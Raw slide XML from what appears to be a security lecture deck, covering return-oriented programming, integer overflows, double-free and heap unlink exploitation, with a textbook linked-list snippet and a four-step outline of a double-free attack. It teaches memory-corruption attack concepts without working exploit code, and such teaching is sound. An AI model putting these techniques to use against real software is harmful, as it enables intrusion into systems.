          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ROP Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678872" y="1551231"/>
            <a:ext cx="10834255" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Return oriented programming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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Another control hijacking technique that does not require creating and executing code on the stack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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Procedure:</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Find “gadgets” in existing code.  Gadgets are short code segments that can be strung together to carry out useful procedures like installing malware.</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Each gadget ends with a ret</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Attacker needs to arrange the stack so that the returns from the identified gadgets carry out the attackers intended purpose.</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Gadgets are “Turing complete” for most installed systems.</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Particularly easy to find on Intel architecture because of the multi-size instructions and the huge variety of instructions.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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38283884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11128"/>
            <a:ext cx="11915876" cy="854075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Other types of overflow attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617922" y="2051228"/>
            <a:ext cx="10680032" cy="3895452"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Unsigned integer overflows</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Suppose n is a 4 byte unsigned integer</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It can hold values 0 ≦n≦ 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-1.</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What is the value of n</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n</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if, say n</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-1, n</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1?  Answer: 0!</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Signed/unsigned conversions</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If n is a signed 4 byte integer, -2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ≦n≦ 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-1</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If you assign a negative integer to an unsigned integer, negative number become huge positive integer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A3672D-A3BD-4B42-A993-5EB15F37B058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11341443" y="6356350"/>
            <a:ext cx="574433" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1495901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Double free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330946" y="1823170"/>
            <a:ext cx="11582400" cy="4799400"/>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Relies on errors in malloc/free to execute arbitrary code</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When a program calls free() twice with the same argument, the heap memory structures become corrupted.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If malloc() returns the same value more than and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.</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When a buffer is free()'d, a linked list of free buffers is read to rearrange and combine the chunks of free memory (to be able to allocate larger buffers in the future). These chunks are laid out in a double linked list which points to previous and next chunks.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Unlinking an unused buffer (which is what happens when free() is called) could allow an attacker to write arbitrary values in memory; essentially overwriting valuable registers, calling shellcode from its own buffer.</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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6607857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63184"/>
            <a:ext cx="11213736" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="376061" y="1855309"/>
            <a:ext cx="5146761" cy="4501042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void list_delete(node_t* n) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  n-&gt;next-&gt;prev = n-&gt;prev;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  n-&gt;prev-&gt;next = n-&gt;next;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void list_insert_after(node_t* n) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  n-&gt;prev = prev;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  n-&gt;next = prev-&gt;next;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  prev-&gt;next-&gt;prev = n;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  prev-&gt;next = n;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a: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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C45858F6-ADDD-A84E-8CBF-D655EF5C8C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5958840" y="1652129"/>
            <a:ext cx="6207760" cy="12192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Attacker in control of prev-&gt;next can write node anywhere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-28575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Use after free uses this</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FA55E7-31EE-FE40-B5A8-514900185C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6618515" y="4415971"/>
            <a:ext cx="1161143" cy="446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C61C1B0C-ED68-354B-AC74-EF56E24E7B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7518401" y="4736646"/>
            <a:ext cx="12264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70663A-64B4-454B-A454-E627994BC352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7155543" y="4423231"/>
            <a:ext cx="0" cy="446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BF8DCD-26C7-C347-950C-C71AD553BB69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210279" y="4404250"/>
            <a:ext cx="558166" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>next</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C315B07-F945-AE4D-8573-77C32DC3D954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610232" y="4397649"/>
            <a:ext cx="577402" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>prev</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79F98E6-16C0-1A46-A53F-D0E0A449D318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8744858" y="4437745"/>
            <a:ext cx="1161143" cy="446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099E9AE8-DB9F-A24C-AA72-7096E8A3E79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9633858" y="4731535"/>
            <a:ext cx="976086" cy="2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44AD949-022E-F54F-92E3-FDFEDF43CC8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9281886" y="4445005"/>
            <a:ext cx="0" cy="446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04D9116-3BAB-0B4E-AE16-BB365F73A3E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336622" y="4426024"/>
            <a:ext cx="558166" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>next</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83DAEB69-96C9-7E4F-BEE8-940450D67405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8736575" y="4419423"/>
            <a:ext cx="577402" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>prev</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85E50AC-E329-F243-90DD-925A8AE5DB48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6618516" y="5314847"/>
            <a:ext cx="2431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69360F-FCB4-B74A-9F7D-BDB613915027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6633028" y="4876805"/>
            <a:ext cx="0" cy="459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31C0200-C5DA-2F4D-8324-4477FEF93FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9049658" y="4869545"/>
            <a:ext cx="0" cy="445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7E2351E-8F4D-DB48-A5BB-E5833830C4C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235526" y="3492073"/>
            <a:ext cx="1010213" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Free list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041F4617-EAC0-4E47-8363-C5E4F4A57772}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633028" y="3817863"/>
            <a:ext cx="0" cy="5797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4528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113983"/>
            <a:ext cx="11213736" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap exploit after double free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700547" y="1932931"/>
            <a:ext cx="10649425" cy="3858271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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After second free, head-&gt;next and head-&gt;prev point to freed block</a:t>
            </a:r>
          </a:p>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Block next and prev also point to it</a:t>
            </a:r>
          </a:p>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After another malloc, same chunk will be returned</a:t>
            </a:r>
          </a:p>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Basic attack</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Get chunk freed twice</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Get one instance reallocated</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Overwrite metadata </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Get second instance allocated so unlink writes to arbitrary address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84921072-8CBB-5344-8536-2948E7CEAEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694267" y="5875867"/>
            <a:ext cx="4673600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From: Ferguson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8768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88927"/>
            <a:ext cx="11842955" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT archive formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300702" y="1770681"/>
            <a:ext cx="6668509" cy="4756151"/>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There are many including Debian like packages.  One of the oldest is cpio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The cpio binary archive has a binary header and a series of binary files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
